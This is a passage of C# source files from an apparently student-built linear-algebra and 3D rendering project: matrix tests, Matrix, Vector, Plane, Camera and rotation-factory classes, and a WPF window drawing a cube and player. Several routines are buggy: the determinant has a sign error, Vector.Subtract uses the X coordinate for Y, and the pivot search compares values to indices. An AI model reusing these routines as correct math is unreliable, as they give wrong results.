mockingMatrix.Invert(); Matrix m2 = new Matrix(3,3); float[,] data2 = { { -2, 1, 0 }, { 5, ((float)-8/3), ((float)1/3) }, { -2, ((float)4/3), ((float)-1/6) } }; m2.SetData(data2); bool identical = true; for (int row = 0; row < mockingMatrix.GetRows(); row++) { for (int column = 0; column < mockingMatrix.GetColumns(); column++) { if (mockingMatrix.Get(row, column) != m2.Get(row, column)) { identical = false; break; } } } Assert.AreEqual(true,identical); } [TestMethod] public void MatrixScaling() { mockingMatrix.Scale(1.1f, 1.1f, 1.1f, false); Matrix m2 = new Matrix(3, 3); float[,] data2 = { { 0, 1.1f, 2.2f }, { 1.1f, 2.2f, 4.4f }, { 8.8f, 4.4f, 2.2f } }; m2.SetData(data2); bool identical = true; for (int row = 0; row < mockingMatrix.GetRows(); row++) { for (int column = 0; column < mockingMatrix.GetColumns(); column++) { if (mockingMatrix.Get(row, column) != m2.Get(row, column)) { identical = false; break; } } } Assert.AreEqual(true, identical); } [TestMethod] public void MatrixTranslate() { mockingMatrix.Translate(5, 3, 12, true); Matrix m2 = new Matrix(3, 3); float[,] data2 = { { 5, 6, 7 }, { 4, 5, 7 }, { 20, 16, 14 } }; m2.SetData(data2); bool identical = true; for (int row = 0; row < mockingMatrix.GetRows(); row++) { for (int column = 0; column < mockingMatrix.GetColumns(); column++) { if (mockingMatrix.Get(row, column) != m2.Get(row, column)) { identical = false; break; } } } Assert.AreEqual(true, identical); } } } <file_sep>using System; using System.Collections.Generic; using System.Data.Common; using System.Linq; using System.Resources; using System.Text; using System.Threading.Tasks; using System.Xaml; namespace LINAL { public class Matrix { private float[,] _data; /* * Creates a new matrix */ public Matrix(int rows, int columns) { _data = new float[rows,columns]; } /* * Gets the amount of rows of the matrix */ public int GetRows() { return _data.GetLength(0); } /* * Gets the amount of columns of the matrix */ public int GetColumns() { return _data.GetLength(1); } /* * Gets the entire dataset of the matrix */ public float[,] GetData() { return _data; } /* * Sets the entire dataset of the matrix */ public void SetData(float[,] data) { _data = data; } /* * Gets on particular number in the datamatrix, based on the row and the column */ public float Get(int row, int column) { if (row >= 0 && row < _data.GetLength(0) && column >= 0 && column < _data.GetLength(1)) return _data[row, column]; return 0; } /* * Sets the data of one particular place in the dataset */ public void Set(int row, int column, float number) { if (row >= 0 && row < _data.GetLength(0) && column >= 0 && column < _data.GetLength(1)) _data[row, column] = number; } /* * Adds the data of a vector to the dataset */ public void AddVector(int column, Vector v) { if (GetRows() < 4) SetSizeWithData(4, GetColumns()); if(column >= GetColumns()) SetSizeWithData(GetRows(), GetColumns()+1); if (column >= GetColumns()) SetSizeWithData(GetRows(), GetColumns() + 1); if (column >= 0) { _data[0, column] = v.GetPoint(0).GetX(); _data[1, column] = v.GetPoint(0).GetY(); _data[2, column] = v.GetPoint(0).GetZ(); if (v.GetHelp() > 0) _data[3, column] = 1; _data[0, column+1] = v.GetPoint(1).GetX(); _data[1, column+1] = v.GetPoint(1).GetY(); _data[2, column+1] = v.GetPoint(1).GetZ(); if (v.GetHelp() > 0) _data[3, column+1] = 1; } } /* * Removes a number from the dataset, based on row and column */ public void Remove(int row, int column) { if (row >= 0 && row < _data.GetLength(0) && column >= 0 && column < _data.GetLength(1)) _data[row, column] = 0; } /* * Sets the size of the dataset, keeping the data in the dataset if possible */ public void SetSizeWithData(int rows, int columns) { float[,] backup = _data; SetSizeWithoutData(rows, columns); for (int row = 0; row < backup.GetLength(0); row++) { for (int column = 0; column < backup.GetLength(1); column++) { if (row < _data.GetLength(0) && column < _data.GetLength(1)) _data[row, column] = backup[row, column]; } } } /* * Sets the size of the dataset, completely removing the previous data */ public void SetSizeWithoutData(int rows, int columns) { _data = new float[rows,columns]; } /* * Resets all values and makes identity matrix */ public void MakeIdentityMatrix() { MakeNullMatrix(); int column = 0; for (int row = 0; row < _data.GetLength(0); row++) { _data[row, column] = 1; column++; } } /* * Resets all values and makes null matrix */ public void MakeNullMatrix() { for (int row = 0; row < _data.GetLength(0); row++) { for (int column = 0; column < _data.GetLength(1); column++) { _data[row, column] = 0; } } } /* * Translates current dataset over x, y , z. Also checks if translation is three dimensional */ public void Translate(float x, float y, float z = 0, bool threedim = false) { bool addedHelpRow = false; Matrix translation = MatrixFactory.GetTranslationMatrix(x, y, z, threedim); if (translation.GetColumns() != GetRows()) { AddHelpRow(); addedHelpRow = true; } translation.Multiply(this); _data = translation.GetData(); if(addedHelpRow) RemoveHelpRow(); } /* * Scales current dataset over x, y, z. Also checks if the dataset contains points instead of vectors */ public void Scale(float x, float y, float z = 0, bool points = true) { Matrix scaling = MatrixFactory.GetScalingMatrix(this, x, y, z); if (points) ScalePoints(scaling); else ScaleVectors(scaling); } /* * Scales points of vectors */ public void ScalePoints(Matrix scaling) { Dictionary<string, List<int>> linkedPoints = new Dictionary<string, List<int>>(); for (int column = 0; column < GetColumns(); column++) { string point = _data[0, column] + ":" + _data[1, column] + ":" + _data[2, column]; if (!linkedPoints.ContainsKey(point)) linkedPoints.Add(point, new List<int>()); linkedPoints[point].Add(column); } Dictionary<int, Point> modifiedPoints = new Dictionary<int, Point>(); Matrix a = ConvertToVectors(); scaling.Multiply(a); int vector = 0; for (int column = 0; column < GetColumns(); column += 2, vector++) { float difX = scaling.Get(0, vector) - a.Get(0, vector); float difY = scaling.Get(1, vector) - a.Get(1, vector); float difZ = scaling.Get(2, vector) - a.Get(2, vector); float x1 = _data[0, column]; float y1 = _data[1, column]; float z1 = _data[2, column]; float x2 = _data[0, column + 1]; float y2 = _data[1, column + 1]; float z2 = _data[2, column + 1]; modifiedPoints.Add(column, new Point(x1 - (difX / 2), y1 - (difY / 2), z1 - (difZ / 2))); modifiedPoints.Add(column + 1, new Point(x2 + (difX / 2), y2 + (difY / 2), z2 + (difZ / 2))); } foreach (string key in linkedPoints.Keys) { string[] str = key.Split(':'); Point original = new Point(float.Parse(str[0]), float.Parse(str[1]), float.Parse(str[2])); float deltaX = 0; float deltaY = 0; float deltaZ = 0; foreach (int column in linkedPoints[key]) { if (!modifiedPoints.ContainsKey(column)) continue; Point p = modifiedPoints[column]; deltaX += (p.GetX() - original.GetX()); deltaY += (p.GetY() - original.GetY()); deltaZ += (p.GetZ() - original.GetZ()); } Point newPoint = new Point(original.GetX() + deltaX, original.GetY() + deltaY, original.GetZ() + deltaZ); foreach (int column in linkedPoints[key]) { _data[0, column] = newPoint.GetX(); _data[1, column] = newPoint.GetY(); _data[2, column] = newPoint.GetZ(); } } } /* * Scales just vectors */ public void ScaleVectors(Matrix scaling) { scaling.Multiply(this); _data = scaling.GetData(); } /* * Used to rotate the dataset */ public void Rotate(float angle, bool threedim, Point p1, Point p2 = null) { if(threedim) Rotate3D(angle, p1, p2); else Rotate2D(angle, p1); } /* * Rotate a 3D matrix a vector going through the origin, or not */ public void Rotate3D(float angle, Point p1, Point p2 = null) { Vector v = null; Point over = null; if (p2 == null) v = new Vector(new Point(0, 0, 0), p1); else { v = new Vector(p1, p2); over = p1; } Matrix rotation = MatrixFactory.Get3DRotationMatrix(angle, v, over); rotation.Multiply(this); _data = rotation.GetData(); } /* * Rotates the dataset over a point, or the origin */ public void Rotate2D(float angle, Point p = null) { if (p == null) { Matrix rotation = MatrixFactory.Rotate2D(angle); Multiply(rotation); } else { Point inverse = new Point(-p.GetX(), -p.GetY(), -p.GetZ()); Translate(-p.GetX(), -p.GetY(), -p.GetZ(), false); Matrix rotation = MatrixFactory.Rotate2D(angle); Multiply(rotation); Translate(p.GetX(), p.GetY(), p.GetZ(), false); } } /* * Gets the highest number in the sequence in the matrix. Used for inversion */ public int GetColumnOfHighestInRow(int column) { int num = 0; for (int i = 0; i < GetRows(); i++) { if (_data[i, column] > num) num = i; } return num; } /* * Adds a help row to sustain conventions */ public void AddHelpRow() { SetSizeWithData(GetRows()+1,GetColumns()); for (int i = 0; i < GetColumns(); i++) _data[GetRows()-1, i] = 1; } /* * Removes the help row that sustains conventions */ public void RemoveHelpRow() { SetSizeWithData(GetRows() - 1, GetColumns()); } /* * Switches rowdata in the matrix */ public void SwitchValues(int row1, int row2) { for (int i = 0; i < GetColumns(); i++) { float backup = _data[row1, i]; _data[row1, i] = _data[row2, i]; _data[row2, i] = backup; } } /* * Prints the matrix */ public void Print() { for (int row = 0; row < _data.GetLength(0); row++) { for (int column = 0; column < _data.GetLength(1); column++) { Console.Write(_data[row, column] + " "); } Console.WriteLine(); } } /* * Inverts the matrix. Cannot be used with points, only vectors */ public void Invert() { if (GetDeterminant() == 0) return; Matrix inversion = new Matrix(GetRows(), GetRows()); inversion.MakeIdentityMatrix(); if (_data[0, 0] == 0f) { int row = GetColumnOfHighestInRow(0); SwitchValues(0,row); inversion.SwitchValues(0,row); } for (int column = 0; column < GetColumns(); column++) { if (_data[column, column] != 1) { float divideBy = _data[column, column]; ModifyRow(divideBy, Operator.DIVIDE, column); inversion.ModifyRow(divideBy, Operator.DIVIDE, column); } for (int row = 0; row < GetRows(); row++) { if (row == column) continue; if (_data[row, column] == 0) continue; float multiplyBy = _data[row, column]/_data[column, column]; for (int col = 0; col < GetColumns(); col++) { float value = _data[column, col]*multiplyBy; float inversionValue = inversion.Get(column, col)*multiplyBy; ModifyRow(value, Operator.SUBTRACT, row, col); inversion.ModifyRow(inversionValue, Operator.SUBTRACT, row, col); } } } _data = inversion.GetData(); } /* * Modifies the values in the row */ public void ModifyRow(float value, Operator op, int row, int column = -1) { if (column > -1) { if (op == Operator.ADD) _data[row, column] += value; else if (op == Operator.SUBTRACT) _data[row, column] -= value; else if (op == Operator.DIVIDE) _data[row, column] /= value; else if (op == Operator.MULTIPLY) _data[row, column] *= value; return; } for (column = 0; column < GetColumns(); column++) { if (op == Operator.ADD) _data[row, column] += value; else if (op == Operator.SUBTRACT) _data[row, column] -= value; else if (op == Operator.DIVIDE) _data[row, column] /= value; else if (op == Operator.MULTIPLY) _data[row, column] *= value; } } /* * Determines the determinant of the matrix */ public float GetDeterminant() { //2D if (GetColumns() < 3) return _data[0, 0]*_data[1, 1] - _data[0, 1]*_data[1, 0]; //3D else { float a = _data[0, 0]*(_data[1, 1]*_data[2, 2] - _data[1, 2]*_data[2, 1]); float b = _data[0, 1] * (_data[1, 0] * _data[2, 2] - _data[2, 0] * _data[1, 2]); float c = _data[0, 2] * (_data[1, 0] * _data[2, 1] - _data[2, 0] * _data[1, 1]); return a - b - c; } } /* * Dot-product. Multiplies the matrix with another */ public void Multiply(Matrix matrix) { if (matrix.GetRows() != GetColumns()) return; Matrix result = new Matrix(GetRows(), matrix.GetColumns()); for (int secondColumns = 0; secondColumns < matrix.GetColumns(); secondColumns++) { for (int secondRows = 0; secondRows < matrix.GetRows(); secondRows++) { for (int firstRows = 0; firstRows < GetRows(); firstRows++) { float num = 0; for (int firstColumns = 0; firstColumns < GetColumns(); firstColumns++) num += Get(firstRows, firstColumns) * matrix.Get(firstColumns, secondColumns); result.Set(firstRows, secondColumns, num); } } } _data = result.GetData(); } /* * Convert points to vectors */ public Matrix ConvertToVectors() { Matrix m = new Matrix(GetRows(), GetColumns()/2); float[,] data = new float[GetRows(),GetColumns()/2]; int newColumn = 0; for (int column = 0; column < GetColumns(); column+=2, newColumn++) { float x = _data[0, column + 1] - _data[0, column]; float y = _data[1, column + 1] - _data[1, column]; float z = _data[2, column + 1] - _data[2, column]; data[0, newColumn] = x; data[1, newColumn] = y; data[2, newColumn] = z; data[3, newColumn] = 1; } m.SetData(data); return m; } /* * Gets the middle point of a matrix */ public Point GetMiddle() { List<Point> points = new List<Point>(); for (int column = 0; column < GetColumns(); column++) { float x = _data[0, column]; float y = _data[1, column]; float z = _data[2, column]; bool existsInList = false; foreach (Point p in points) { if (p.GetX() == x && p.GetY() == y && p.GetZ() == z) { existsInList = true; break; } } if(!existsInList) points.Add(new Point(x,y,z)); } float x1 = float.MinValue; float x2 = float.MaxValue; float y1 = float.MinValue; float y2 = float.MaxValue; float z1 = float.MinValue; float z2 = float.MaxValue; foreach (Point p in points) { if (p.GetX() > x1) x1 = p.GetX(); else if (p.GetX() < x2) x2 = p.GetX(); if (p.GetY() > y1) y1 = p.GetY(); else if (p.GetY() < y2) y2 = p.GetY(); if (p.GetZ() > z1) z1 = p.GetZ(); else if (p.GetZ() < z2) z2 = p.GetZ(); } float newX = x1 + ((x2 - x1)/2); float newY = y1 + ((y2 - y1) / 2); float newZ = z1 + ((z2 - z1) / 2); return new Point(newX, newY, newZ); } /* * Get the middle of the furthest and nearest X coordinate */ public float GetWidth() { List<Point> points = new List<Point>(); for (int column = 0; column < GetColumns(); column++) { float x = _data[0, column]; float y = _data[1, column]; float z = _data[2, column]; bool existsInList = false; foreach (Point p in points) { if (p.GetX() == x && p.GetY() == y && p.GetZ() == z) { existsInList = true; break; } } if (!existsInList) points.Add(new Point(x, y, z)); } float x1 = float.MinValue; float x2 = float.MaxValue; foreach (Point p in points) { if (p.GetX() > x1) x1 = p.GetX(); else if (p.GetX() < x2) x2 = p.GetX(); } return x2 - x1; } } public enum Operator { ADD = 0, SUBTRACT = 1, DIVIDE = 2, MULTIPLY = 3, } } <file_sep>using System; using System.Collections.Generic; using System.Linq; using System.Runtime.CompilerServices; using System.Text; using System.Threading.Tasks; namespace LINAL { public class Plane { private readonly List<Point> _points = new List<Point>(); private float formulaX; private float formulaY; private float formulaZ; private float formulaAnswer; /* * Adds a point to the plane */ public void Add(Point p) { _points.Add(p); } /* * Removes a point from the plane */ public void Remove(Point p) { _points.Remove(p); } /* * Removes a point from the plane */ public void Remove(int index) { _points.RemoveAt(index); } /* * Gets all points */ public List<Point> GetPoints() { return _points; } /* * Returns the support vector */ public Vector GetSupportVector() { return _points[0].MakeVector(); } /* * Returns the normal vector */ public Vector GetNormalVector() { return GetDirectionalVectors()[0].GetCrossProduct(GetDirectionalVectors()[1]); } /* * Returns the radians of the inproduct */ public double GetRadiansFromInproduct(float inproduct) { var vectors = GetDirectionalVectors(); double result = inproduct/(vectors[0].GetLength()*vectors[1].GetLength()); return Math.Acos(result); } /* * Returns the angle of the inproduct */ public double GetAngleFromInproduct(float inproduct) { var radians = GetRadiansFromInproduct(inproduct); return radians/Math.PI*180; } /* * Checks if a point resides within the plane */ public bool IsInPlane(Point p) { return (formulaX*p.GetX()) + (formulaY*p.GetY()) + (formulaZ*p.GetZ()) == formulaAnswer; } /* * Returns the directional vectors of the plane */ public List<Vector> GetDirectionalVectors() { var v = new List<Vector>(); for (var i = 1; i < _points.Count; i++) { var p = _points[i]; var x = p.GetX() - GetSupportVector().GetX(); var y = p.GetY() - GetSupportVector().GetY(); var z = p.GetZ() - GetSupportVector().GetZ(); while (true) { if (x % 2 == 0 && y % 2 == 0 && z % 2 == 0) { x /= 2; y /= 2; z /= 2; } else { break; } } v.Add((new Point(x,y,z)).MakeVector()); } return v; } /* * Builds the formula to see wether a point resides in a plane */ public void BuildFormula() { var vectors = GetDirectionalVectors(); if (vectors[0].IsDependantOf(vectors[1])) return; var normalVector = vectors[0].GetCrossProduct(vectors[1]); formulaX = normalVector.GetX(); formulaY = normalVector.GetY(); formulaZ = normalVector.GetZ(); formulaAnswer = normalVector.GetInproduct(GetSupportVector()); } } } <file_sep>using System; using System.Collections.Generic; using System.Linq; using System.Text; using System.Threading.Tasks; using System.Windows.Navigation; namespace LINAL { class MatrixFactory { /* * Returns a scaling matrix, two and three dimensional */ public static Matrix GetScalingMatrix(Matrix m, float x, float y, float z= 0) { Matrix scalingMatrix = new Matrix(m.GetRows(), m.GetRows()); scalingMatrix.Set(0, 0, x); scalingMatrix.Set(1, 1, y); if (z != 0) scalingMatrix.Set(2, 2, z); return scalingMatrix; } /* * Returns a translation matrix, two and three dimensional */ public static Matrix GetTranslationMatrix(float x, float y, float z = 0, bool threedim = false) { Matrix translationMatrix = null; if (threedim) { translationMatrix = new Matrix(4, 4); translationMatrix.MakeIdentityMatrix(); translationMatrix.Set(0, 3, x); translationMatrix.Set(1, 3, y); translationMatrix.Set(2, 3, z); } else { translationMatrix = new Matrix(3, 3); translationMatrix.MakeIdentityMatrix(); translationMatrix.Set(0, 2, x); translationMatrix.Set(1, 2, y); } return translationMatrix; } /* * Returns a 2D rotation matrix. */ public static Matrix Rotate2D(float alpha) { Matrix rotationMatrix = new Matrix(2,2); float cos = GonioFactory.GetTrigonometricByDegrees(alpha, Trigonometric.Cosine); float sin = GonioFactory.GetTrigonometricByDegrees(alpha, Trigonometric.Sine); float[,] data = { {cos,-sin}, {sin,cos} }; rotationMatrix.SetData(data); return rotationMatrix; } /* * Returns a 3D rotation matrix, over a vector, or a vector through the origin */ public static Matrix Get3DRotationMatrix(float alpha, Vector rotationVector, Point translateOver = null) { Matrix rotationMatrix = new Matrix(4,4); rotationMatrix.MakeIdentityMatrix(); if (translateOver != null) { Matrix translation = GetTranslationMatrix(-translateOver.GetX(), -translateOver.GetY(), -translateOver.GetZ(), true); translation.Multiply(rotationMatrix); rotationMatrix = translation; } float t1 = GonioFactory.GetArcTrigonometricByRadians(rotationVector.GetZ(), rotationVector.GetX(), Trigonometric.Tangent2); var yRotation = MatrixFactory.Rotate3DYAxis(t1, true); yRotation.Multiply(rotationMatrix); rotationMatrix = yRotation; float newX = (float)Math.Sqrt(rotationVector.GetX() * rotationVector.GetX() + rotationVector.GetZ() * rotationVector.GetZ()); float t2 = GonioFactory.GetArcTrigonometricByRadians(rotationVector.GetY(), newX, Trigonometric.Tangent2); var zRotation = MatrixFactory.Rotate3DZAxis(t2, true); zRotation.Multiply(rotationMatrix); rotationMatrix = zRotation; Matrix rotate = MatrixFactory.Rotate3DXAxis(GonioFactory.DegreesToRadians(alpha), false); rotate.Multiply(rotationMatrix); rotationMatrix = rotate; var reverseZRotation = MatrixFactory.Rotate3DZAxis(t2, false); reverseZRotation.Multiply(rotationMatrix); rotationMatrix = reverseZRotation; var reverseYRotation = MatrixFactory.Rotate3DYAxis(t1, false); reverseYRotation.Multiply(rotationMatrix); rotationMatrix = reverseYRotation; if (translateOver != null) { Matrix translation = GetTranslationMatrix(translateOver.GetX(), translateOver.GetY(), translateOver.GetZ(), true); translation.Multiply(rotationMatrix); rotationMatrix = translation; } return rotationMatrix; } /* * Returns a 3D matrix based on the X axis */ public static Matrix Rotate3DXAxis(float alpha, bool reverse) { Matrix rotationMatrix = new Matrix(4, 4); float cos = GonioFactory.GetTrigonometricByRadians(alpha, Trigonometric.Cosine); float sin = GonioFactory.GetTrigonometricByRadians(alpha, Trigonometric.Sine); if (reverse) sin = -sin; float[,] data = { {1, 0, 0, 0}, {0, cos, -sin, 0}, {0, sin, cos, 0}, {0,0,0,1 } }; rotationMatrix.SetData(data); return rotationMatrix; } /* * Returns a 3D matrix based on the Y axis */ public static Matrix Rotate3DYAxis(float alpha, bool reverse) { Matrix rotationMatrix = new Matrix(4, 4); float cos = GonioFactory.GetTrigonometricByRadians(alpha, Trigonometric.Cosine); float sin = GonioFactory.GetTrigonometricByRadians(alpha, Trigonometric.Sine); if (reverse) sin = -sin; float[,] data = { { cos, 0, -sin, 0}, {0, 1, 0, 0}, {sin, 0, cos, 0}, {0,0,0,1 } }; rotationMatrix.SetData(data); return rotationMatrix; } /* * Returns a 3D matrix based on the Z axis */ public static Matrix Rotate3DZAxis(float alpha, bool reverse) { Matrix rotationMatrix = new Matrix(4, 4); float cos = GonioFactory.GetTrigonometricByRadians(alpha, Trigonometric.Cosine); float sin = GonioFactory.GetTrigonometricByRadians(alpha, Trigonometric.Sine); if (reverse) sin = -sin; float[,] data = { {cos, -sin, 0, 0}, {sin, cos, 0, 0}, {0, 0, 1, 0}, {0,0,0,1 } }; rotationMatrix.SetData(data); return rotationMatrix; } } } <file_sep>using System; using System.Collections.Generic; using System.Linq; using System.Text; using System.Threading.Tasks; namespace LINAL { public class Vector { private Point[] points = new Point[2]; private float help; public Vector(Point p1, Point p2) { points[0] = p1; points[1] = p2; this.help = 1; } public Point GetPoint(int index) { return points[index]; } public float GetX() { return points[1].GetX() - points[0].GetX(); } public float GetY() { return points[1].GetY() - points[0].GetY(); } public float GetZ() { return points[1].GetZ() - points[0].GetZ(); } public float GetHelp() { return help; } public void SetHelp(int help) { this.help = help; } /* * Returns the length of the vector */ public float GetLength() { return (float) Math.Sqrt(GetX()*GetX() + GetY()*GetY() + GetZ()*GetZ()); } /* * Checks if this vector is dependant of the other vector */ public bool IsDependantOf(Vector v) { var factorX = GetX() / v.GetX(); var factorY = GetY() / v.GetY(); var factorZ = GetZ() / v.GetZ(); return factorX == factorY && factorY == factorZ; } /* * Adds a vector to this one */ public Vector Add(Vector v) { float x = GetX() + v.GetX(); float y = GetY() + v.GetY(); float z = GetZ() + v.GetZ(); Point p = new Point(GetPoint(0).GetX() + x, GetPoint(0).GetY() + y, GetPoint(0).GetZ() + z); return new Vector(GetPoint(0), p); } /* * Subtracts a vector from this one */ public Vector Subtract(Vector v) { float x = GetX() - v.GetX(); float y = GetY() - v.GetY(); float z = GetZ() - v.GetZ(); Point p = new Point(GetPoint(0).GetX() + x, GetPoint(0).GetX() + y, GetPoint(0).GetZ()+z); return new Vector(GetPoint(0), p); } /* * Transforms vector to a unit vector */ public void MakeUnitVector() { float length = GetLength(); float x = GetX() / length; float y = GetY() / length; float z = GetZ() / length; points[1].SetX(x); points[1].SetY(y); points[1].SetZ(z); } /* * Enlarges the vector */ public void Enlarge(float factor) { float x = GetX() * factor; float y = GetY() * factor; float z = GetZ() * factor; points[1].SetX(x); points[1].SetY(y); points[1].SetZ(z); } /* * Simplifies vectors */ public Vector GetSimplified() { var x = GetX(); var y = GetY(); var z = GetZ(); while (true) { if (x % 2 == 0 && y % 2 == 0 && z % 2 == 0) { x /= 2; y /= 2; z /= 2; } else { break; } } var p = new Point(points[0].GetX() + x, points[0].GetY() + y, points[0].GetZ() + z); return new Vector(points[0], p); } /* * Calculates crossproduct of vectors */ public Vector GetCrossProduct(Vector v) { var x = GetY() * v.GetZ() - v.GetY() * GetZ(); var y = v.GetX() * GetZ() - GetX() * v.GetZ(); var z = GetX() * v.GetY() - v.GetX() * GetY(); var realX = points[0].GetX() + x; var realY = points[0].GetY() + y; var realZ = points[0].GetZ() + z; var point = new Point(realX, realY, realZ); return new Vector(points[0], point); } /* * Calculates inproduct of vectors */ public float GetInproduct(Vector v) { return GetX() * v.GetX() + GetY() * v.GetY() + GetZ() * v.GetZ(); } /* * Moves the vector based on the directional vector */ public void Move(float speed, Vector Direction) { Direction.Enlarge(speed); GetPoint(0).SetX(GetPoint(0).GetX() + Direction.GetX()); GetPoint(1).SetX(GetPoint(1).GetX() + Direction.GetX()); GetPoint(0).SetY(GetPoint(0).GetY() + Direction.GetY()); GetPoint(1).SetY(GetPoint(1).GetY() + Direction.GetY()); } /* * Prints the vector */ public void Print() { Console.WriteLine("Vector x: " + GetX() + ", y:" + GetY() + ", z: " + GetZ() + ", Length: " + GetLength()); } } } <file_sep>using System; using System.Collections.Generic; using System.Linq; using System.Runtime.InteropServices.ComTypes; using System.Text; using System.Threading.Tasks; namespace LINAL { class Camera { private Vector _eye; private Vector _lookAt; private Vector _up; private Vector _x, _y, _z; /* * Initializes the camera and creates the vectors for the first time */ public Camera() { SetEye(0, 200, 200); SetLookAtPoint(0, 0, 0); SetUp(0, 1, 0); SetVectors(); } /* * Initializes the Eye position */ public void SetEye(float x, float y, float z) { _eye = (new Point(x, y, z)).MakeVector(); _eye.SetHelp(1); } /* * Initializes the LookAt position */ public void SetLookAtPoint(float x, float y, float z) { _lookAt = (new Point(x, y, z)).MakeVector(); _lookAt.SetHelp(1); } /* * Initializes the Up position */ public void SetUp(float x, float y, float z) { _up = (new Point(x, y, z)).MakeVector(); _up.SetHelp(1); } /* * Rebuilds the camera vectors */ public void SetVectors() { _z = _eye.Subtract(_lookAt); _y = _up; _x = _y.GetCrossProduct(_z); _y = _z.GetCrossProduct(_x); _x.MakeUnitVector(); _y.MakeUnitVector(); _z.MakeUnitVector(); } /* * Returns the camera as a matrix. Uses all updated values */ public Matrix Get() { Matrix cameraMatrix = new Matrix(4, 4); float[,] data = { { _x.GetX(), _x.GetY(), _x.GetZ(), -_x.GetInproduct(_eye) }, { _y.GetX(), _y.GetY(), _y.GetZ(), -_y.GetInproduct(_eye) }, { _z.GetX(), _z.GetY(), _z.GetZ(), -_z.GetInproduct(_eye) }, { 0, 0, 0, 1 } }; cameraMatrix.SetData(data); return cameraMatrix; } } } <file_sep>using System; using System.Collections.Generic; using System.Linq; using System.Text; using System.Threading; using System.Threading.Tasks; using System.Windows; using System.Windows.Controls; using System.Windows.Data; using System.Windows.Documents; using System.Windows.Input; using System.Windows.Media; using System.Windows.Media.Animation; using System.Windows.Media.Imaging; using System.Windows.Navigation; using System.Windows.Shapes; using System.Windows.Threading; namespace LINAL { /// <summary> /// floateraction logic for MainWindow.xaml /// </summary> public partial class MainWindow : Window { private Camera camera; private Perspective perspective; private List<Matrix> weergaveVectoren; private Dictionary<string, Matrix> wereldVectoren; private Point r1, r2; private DispatcherTimer t = new DispatcherTimer(); /* * Initializes the Cube, Player, Camera, Perspective and the dispatchtimer for the cube. */ public MainWindow() { InitializeComponent(); weergaveVectoren = new List<Matrix>(); wereldVectoren = new Dictionary<string, Matrix>(); camera = new Camera(); perspective = new Perspective(1, 150); CreatePlayer(); CreateCube(); t.Tick += ScaleCube; t.Interval = new TimeSpan(0, 0, 0, 0, 400); t.Start(); } /* * Scales the cube every 400 milliseconds. Stops when size reaches 1/3 of screensize */ void ScaleCube(object sender, EventArgs e) { wereldVectoren["Cube"].Scale(1.1f, 1.1f, 1.1f); Draw(); Console.WriteLine(Math.Abs(wereldVectoren["Cube"].GetWidth()) + " - " + perspective.GetScreenSize()); if (Math.Abs(wereldVectoren["Cube"].GetWidth()) >= perspective.GetScreenSize()) t.Stop(); } /* * Create the player object and add it to the world vectors */ public void CreatePlayer() { Point A = new Point(-80, 0, 195); Point B = new Point(0, 0, 195); Point C = new Point(-80, 0, 179); Point D = new Point(0, 0, 179); Point E = new Point(-80, 16, 195); Point F = new Point(0, 16, 195); Point G = new Point(-80, 16, 179); Point H = new Point(0, 16, 179); Vector AB = new Vector(A, B); Vector AC = new Vector(A, C); Vector BD = new Vector(B, D); Vector CD = new Vector(C, D); Vector AE = new Vector(A, E); Vector BF = new Vector(B, F); Vector DH = new Vector(D, H); Vector CG = new Vector(C, G); Vector EF = new Vector(E, F); Vector EG = new Vector(E, G); Vector FH = new Vector(F, H); Vector GH = new Vector(G, H); Vector[] x = { AB, AC, BD, CD, AE, BF, DH, CG, EF, EG, FH, GH }; Matrix punten = new Matrix(4, x.Length*2); int i = 0; int place = 0; while (i < punten.GetColumns()/2) { punten.AddVector(place, x[i]); i++; place += 2; } wereldVectoren.Add("Player", punten); SetPlayerMiddle(); } /* * Calculate the middle of the player */ private void SetPlayerMiddle() { r1 = wereldVectoren["Player"].GetMiddle(); r1.SetZ(0); r2 = wereldVectoren["Player"].GetMiddle(); } /* * Create the cube that grows at the horizon */ private void CreateCube() { Point A = new Point(-1, -1, 1); Point B = new Point(1, -1, 1); Point C = new Point(-1, -1, -1); Point D = new Point(1, -1, -1); Point E = new Point(-1, 1, 1); Point F = new Point(1, 1, 1); Point G = new Point(-1, 1, -1); Point H = new Point(1, 1, -1); Vector AB = new Vector(A, B); Vector AC = new Vector(A, C); Vector BD = new Vector(B, D); Vector CD = new Vector(C, D); Vector AE = new Vector(A, E); Vector BF = new Vector(B, F); Vector DH = new Vector(D, H); Vector CG = new Vector(C, G); Vector EF = new Vector(E, F); Vector EG = new Vector(E, G); Vector FH = new Vector(F, H); Vector GH = new Vector(G, H); Vector[] x = { AB, AC, BD, CD, AE, BF, DH, CG, EF, EG, FH, GH }; Matrix punten = new Matrix(4, x.Length * 2); int i = 0; int place = 0; while (i < punten.GetColumns() / 2) { punten.AddVector(place, x[i]); i++; place += 2; } wereldVectoren.Add("Cube", punten); } /* * Creates the view vectors. Camera, Perspective & Recalculation */ private void CreateViewVectors() { weergaveVectoren.Clear(); foreach (string wereld in wereldVectoren.Keys) { Matrix m = wereldVectoren[wereld]; Matrix wereldVector = perspective.Get(); wereldVector.Multiply(camera.Get()); wereldVector.Multiply(m); for (int column = 0; column < wereldVector.GetColumns(); column++) { float x = wereldVector.Get(0, column); float y = wereldVector.Get(1, column); float z = wereldVector.Get(2, column); float w = wereldVector.Get(3, column); x = (float)((perspective.GetScreenSize() / 2) + ((x + 1) / w) * perspective.GetScreenSize() * 0.5); y = (float)((perspective.GetScreenSize() / 2) + ((y + 1) / w) * perspective.GetScreenSize() * 0.5); z = -z; wereldVector.Set(0, column, x); wereldVector.Set(1, column, y); wereldVector.Set(2, column, z); } weergaveVectoren.Add(wereldVector); } } /* * Draws all view vectors */ private void Draw() { CreateViewVectors(); MyCanvas.Children.Clear(); foreach (Matrix weergave in weergaveVectoren) { for (int column = 0; column < weergave.GetColumns(); column+=2) { if (weergave.Get(3, column) <= 0 || weergave.Get(3, column + 1) <= 0) continue; var line = new Line(); line.X1 = weergave.Get(0, column); line.X2 = weergave.Get(0, column + 1); line.Y1 = weergave.Get(1, column); line.Y2 = weergave.Get(1, column + 1); line.StrokeThickness = 2; line.Stroke = Brushes.Blue; MyCanvas.Children.Add(line); } } } /* * Handles all key presses */ private void MainWindow_OnKeyDown(object sender, KeyEventArgs e) { if (e.Key == Key.Q) { wereldVectoren["Player"].Rotate(-10, true, r2, r1); } else if (e.Key == Key.E) { wereldVectoren["Player"].Rotate(10, true, r2, r1); } if (e.Key == Key.Left) { wereldVectoren["Player"].Translate(-10, 0, 0, true); SetPlayerMiddle(); } else if (e.Key == Key.Right) { wereldVectoren["Player"].Translate(10, 0, 0, true); SetPlayerMiddle(); } else if (e.Key == Key.Up) { wereldVectoren["Player"].Translate(0, 0, -10, true); 